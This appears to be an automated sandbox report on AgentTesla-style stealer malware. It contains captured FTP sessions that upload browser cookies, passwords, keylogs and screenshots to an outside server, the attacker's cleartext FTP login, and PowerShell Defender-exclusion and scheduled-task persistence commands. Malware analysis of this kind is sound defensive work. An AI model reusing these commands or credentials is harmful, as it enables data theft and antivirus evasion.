                                      Sep 27, 2024 13:10:19.570862055 CEST2149741110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:19.571049929 CEST2149741110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:19.571302891 CEST2149741110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:19.901110888 CEST2149741110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 1.341 seconds (measured here), 258.03 bytes per second
                                      Sep 27, 2024 13:10:20.202588081 CEST4974121192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:10:21.281092882 CEST2149741110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,234,56)
                                      Sep 27, 2024 13:10:21.284106016 CEST2149741110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,234,56)
                                      Sep 27, 2024 13:10:21.284137011 CEST2149741110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,234,56)
                                      Sep 27, 2024 13:10:21.341022015 CEST4974121192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-849224_2024_09_27_13_38_41.txt
                                      Sep 27, 2024 13:10:22.180212975 CEST2149741110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:22.513676882 CEST2149741110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.334 seconds (measured here), 9.82 Kbytes per second
                                      Sep 27, 2024 13:10:22.516904116 CEST4974121192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:10:22.701957941 CEST2149751110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:10:22.702133894 CEST4975121192.168.2.4110.4.45.197USER origin@haliza.com.my
                                      Sep 27, 2024 13:10:22.847029924 CEST2149741110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,254,162)
                                      Sep 27, 2024 13:10:22.852849007 CEST4974121192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-849224_2024_09_27_16_16_58.txt
                                      Sep 27, 2024 13:10:23.032072067 CEST2149751110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                      Sep 27, 2024 13:10:23.032488108 CEST4975121192.168.2.4110.4.45.197PASS JesusChrist007$
                                      Sep 27, 2024 13:10:23.385102034 CEST2149751110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                      Sep 27, 2024 13:10:23.682950020 CEST2149741110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:23.715152979 CEST2149751110.4.45.197192.168.2.4504 Unknown command
                                      Sep 27, 2024 13:10:23.715291977 CEST4975121192.168.2.4110.4.45.197PWD
                                      Sep 27, 2024 13:10:24.018543005 CEST2149741110.4.45.197192.168.2.4226 File successfully transferred
                                      Sep 27, 2024 13:10:24.044948101 CEST2149751110.4.45.197192.168.2.4257 "/" is your current location
                                      Sep 27, 2024 13:10:24.045090914 CEST4975121192.168.2.4110.4.45.197TYPE I
                                      Sep 27, 2024 13:10:24.374522924 CEST2149751110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                      Sep 27, 2024 13:10:24.374686003 CEST4975121192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:10:24.704941034 CEST2149751110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,201,41)
                                      Sep 27, 2024 13:10:24.710805893 CEST4975121192.168.2.4110.4.45.197STOR PW_user-849224_2024_09_27_07_10_21.html
                                      Sep 27, 2024 13:10:25.537411928 CEST2149751110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:25.868066072 CEST2149751110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.331 seconds (measured here), 1.02 Kbytes per second
                                      Sep 27, 2024 13:10:25.892936945 CEST4975121192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:10:26.223146915 CEST2149751110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,255,81)
                                      Sep 27, 2024 13:10:26.228996992 CEST4975121192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-849224_2024_09_27_12_59_12.txt
                                      Sep 27, 2024 13:10:27.066812992 CEST2149751110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:29.133990049 CEST2149756110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:10:29.134206057 CEST4975621192.168.2.4110.4.45.197USER origin@haliza.com.my
                                      Sep 27, 2024 13:10:29.461889982 CEST2149756110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                      Sep 27, 2024 13:10:29.462064028 CEST4975621192.168.2.4110.4.45.197PASS JesusChrist007$
                                      Sep 27, 2024 13:10:29.822135925 CEST2149756110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                      Sep 27, 2024 13:10:30.154460907 CEST2149756110.4.45.197192.168.2.4504 Unknown command
                                      Sep 27, 2024 13:10:30.154666901 CEST4975621192.168.2.4110.4.45.197PWD
                                      Sep 27, 2024 13:10:30.482898951 CEST2149756110.4.45.197192.168.2.4257 "/" is your current location
                                      Sep 27, 2024 13:10:30.483570099 CEST4975621192.168.2.4110.4.45.197TYPE I
                                      Sep 27, 2024 13:10:30.811661959 CEST2149756110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                      Sep 27, 2024 13:10:30.812300920 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:10:31.140465021 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,217,178)
                                      Sep 27, 2024 13:10:31.146662951 CEST4975621192.168.2.4110.4.45.197STOR PW_user-849224_2024_09_27_07_10_27.html
                                      Sep 27, 2024 13:10:31.976399899 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:32.303776026 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.336 seconds (measured here), 1.01 Kbytes per second
                                      Sep 27, 2024 13:10:32.323329926 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:10:32.656864882 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,235,22)
                                      Sep 27, 2024 13:10:32.663347960 CEST4975621192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-849224_2024_09_27_13_09_18.txt
                                      Sep 27, 2024 13:10:33.498569965 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:33.828073978 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.328 seconds (measured here), 9.98 Kbytes per second
                                      Sep 27, 2024 13:10:33.828564882 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:10:34.156984091 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,238,235)
                                      Sep 27, 2024 13:10:34.162580967 CEST4975621192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-849224_2024_09_27_15_28_13.txt
                                      Sep 27, 2024 13:10:34.992522955 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:35.323205948 CEST2149756110.4.45.197192.168.2.4226 File successfully transferred
                                      Sep 27, 2024 13:11:39.040805101 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:11:39.378043890 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,204,216)
                                      Sep 27, 2024 13:11:39.386344910 CEST4973721192.168.2.4110.4.45.197STOR KL_user-849224_2024_10_15_03_01_59.html
                                      Sep 27, 2024 13:11:40.304414988 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:11:40.667108059 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.361 seconds (measured here), 0.76 Kbytes per second
                                      Sep 27, 2024 13:11:58.709117889 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:11:59.099595070 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,204,104)
                                      Sep 27, 2024 13:11:59.110579967 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_10_14_02_30_34.jpeg
                                      Sep 27, 2024 13:11:59.945193052 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:00.780853033 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.836 seconds (measured here), 66.92 Kbytes per second
                                      Sep 27, 2024 13:12:01.023907900 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.836 seconds (measured here), 66.92 Kbytes per second
                                      Sep 27, 2024 13:12:19.012639999 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:19.463406086 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,218,150)
                                      Sep 27, 2024 13:12:19.528964043 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_03_04_07_46.jpeg
                                      Sep 27, 2024 13:12:19.748332024 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:20.253776073 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,244,97)
                                      Sep 27, 2024 13:12:20.294255972 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_10_25_12_14_45.jpeg
                                      Sep 27, 2024 13:12:20.528198004 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:20.766846895 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:21.233882904 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:21.349622011 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.802 seconds (measured here), 69.67 Kbytes per second
                                      Sep 27, 2024 13:12:22.146176100 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.937 seconds (measured here), 59.65 Kbytes per second
                                      Sep 27, 2024 13:12:26.871378899 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:27.250178099 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,240,84)
                                      Sep 27, 2024 13:12:27.264462948 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_10_30_18_53_08.jpeg
                                      Sep 27, 2024 13:12:28.204030037 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:29.347023964 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.971 seconds (measured here), 57.55 Kbytes per second
                                      Sep 27, 2024 13:12:29.463661909 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.971 seconds (measured here), 57.55 Kbytes per second
                                      Sep 27, 2024 13:12:30.072341919 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:30.461297035 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,218,16)
                                      Sep 27, 2024 13:12:30.466968060 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_05_10_22_41.jpeg
                                      Sep 27, 2024 13:12:31.309773922 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:32.126585960 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.818 seconds (measured here), 68.35 Kbytes per second
                                      Sep 27, 2024 13:12:37.840342999 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:38.203234911 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,250,130)
                                      Sep 27, 2024 13:12:38.208956003 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_14_11_04_28.jpeg
                                      Sep 27, 2024 13:12:38.216949940 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:38.587141991 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,216,142)
                                      Sep 27, 2024 13:12:38.592953920 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_11_04_13_22.jpeg
                                      Sep 27, 2024 13:12:39.049989939 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:39.521429062 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:39.848197937 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.802 seconds (measured here), 69.67 Kbytes per second
                                      Sep 27, 2024 13:12:40.469153881 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.946 seconds (measured here), 59.07 Kbytes per second
                                      Sep 27, 2024 13:12:45.103346109 CEST4975621192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:45.459942102 CEST2149756110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,217,216)
                                      Sep 27, 2024 13:12:45.467314959 CEST4975621192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_18_13_13_57.jpeg
                                      Sep 27, 2024 13:12:46.360636950 CEST2149756110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:47.265567064 CEST2149756110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.905 seconds (measured here), 61.79 Kbytes per second
                                      Sep 27, 2024 13:12:53.126218081 CEST2149777110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 19:12. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 19:12. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 19:12. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 50 allowed.220-Local time is now 19:12. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:12:53.126368999 CEST4977721192.168.2.4110.4.45.197USER origin@haliza.com.my
                                      Sep 27, 2024 13:12:53.454895973 CEST2149777110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                      Sep 27, 2024 13:12:53.456473112 CEST4977721192.168.2.4110.4.45.197PASS JesusChrist007$
                                      Sep 27, 2024 13:12:53.820796013 CEST2149777110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                      Sep 27, 2024 13:12:54.150491953 CEST2149777110.4.45.197192.168.2.4504 Unknown command
                                      Sep 27, 2024 13:12:54.152523041 CEST4977721192.168.2.4110.4.45.197PWD
                                      Sep 27, 2024 13:12:54.480330944 CEST2149777110.4.45.197192.168.2.4257 "/" is your current location
                                      Sep 27, 2024 13:12:54.480482101 CEST4977721192.168.2.4110.4.45.197TYPE I
                                      Sep 27, 2024 13:12:54.806366920 CEST2149777110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                      Sep 27, 2024 13:12:54.806555033 CEST4977721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:55.133074045 CEST2149777110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,228,252)
                                      Sep 27, 2024 13:12:55.138752937 CEST4977721192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_23_20_57_19.jpeg
                                      Sep 27, 2024 13:12:56.066729069 CEST2149777110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:56.997684002 CEST2149777110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.931 seconds (measured here), 65.26 Kbytes per second
                                      Sep 27, 2024 13:12:57.608388901 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:12:57.973038912 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,224,62)
                                      Sep 27, 2024 13:12:57.981863976 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_11_25_03_40_54.jpeg
                                      Sep 27, 2024 13:12:58.811820030 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:12:59.608923912 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.804 seconds (measured here), 69.50 Kbytes per second
                                      Sep 27, 2024 13:13:26.072145939 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:13:26.452203989 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,201,90)
                                      Sep 27, 2024 13:13:26.460886002 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_12_14_01_34_56.jpeg
                                      Sep 27, 2024 13:13:27.453784943 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:13:28.407711029 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.934 seconds (measured here), 59.88 Kbytes per second
                                      Sep 27, 2024 13:13:44.648521900 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:13:45.057925940 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,221,92)
                                      Sep 27, 2024 13:13:45.077049971 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_12_24_06_30_21.jpeg
                                      Sep 27, 2024 13:13:45.984015942 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:13:46.922559023 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.931 seconds (measured here), 60.04 Kbytes per second
                                      Sep 27, 2024 13:13:52.715584040 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:13:53.077083111 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,241,63)
                                      Sep 27, 2024 13:13:53.082746029 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_12_29_21_58_53.jpeg
                                      Sep 27, 2024 13:13:53.906615019 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:13:54.731836081 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.798 seconds (measured here), 70.09 Kbytes per second
                                      Sep 27, 2024 13:14:02.400526047 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:14:02.839585066 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,250,95)
                                      Sep 27, 2024 13:14:02.845113993 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2025_01_07_06_50_58.jpeg
                                      Sep 27, 2024 13:14:03.993027925 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:14:04.215801001 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:14:05.018769026 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 1.343 seconds (measured here), 41.63 Kbytes per second
                                      Sep 27, 2024 13:14:12.806090117 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:14:13.186691046 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,242,137)
                                      Sep 27, 2024 13:14:13.192327976 CEST4973721192.168.2.4110.4.45.197STOR SC_user-849224_2024_09_27_07_14_12.jpeg
                                      Sep 27, 2024 13:14:13.666157007 CEST2149790110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 19:14. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 14 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:14:13.666340113 CEST4979021192.168.2.4110.4.45.197USER origin@haliza.com.my
                                      Sep 27, 2024 13:14:13.965307951 CEST2149791110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 15 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 15 of 50 allowed.220-Local time is now 19:14. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 15 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 15 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 15 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:14:13.965465069 CEST4979121192.168.2.4110.4.45.197USER origin@haliza.com.my
                                      Sep 27, 2024 13:14:14.024213076 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:14:14.053566933 CEST2149790110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                      Sep 27, 2024 13:14:14.053886890 CEST4979021192.168.2.4110.4.45.197PASS JesusChrist007$
                                      Sep 27, 2024 13:14:14.334882975 CEST2149791110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                      Sep 27, 2024 13:14:14.335005045 CEST4979121192.168.2.4110.4.45.197PASS JesusChrist007$
                                      Sep 27, 2024 13:14:14.443470001 CEST2149790110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                      Sep 27, 2024 13:14:14.713192940 CEST2149791110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                      Sep 27, 2024 13:14:14.776681900 CEST2149790110.4.45.197192.168.2.4504 Unknown command
                                      Sep 27, 2024 13:14:14.831434011 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.810 seconds (measured here), 69.05 Kbytes per second

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:07:09:57
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\rQuotation3200025006.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\rQuotation3200025006.exe"
                                      Imagebase:0x1f0000
                                      File size:645'120 bytes
                                      MD5 hash:36C4BFF0F1CDCDA62DA9229500CA1E38
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe"
                                      Imagebase:0x880000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                                      Imagebase:0x880000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp"
                                      Imagebase:0x6f0000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:07:10:00
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:07:10:00
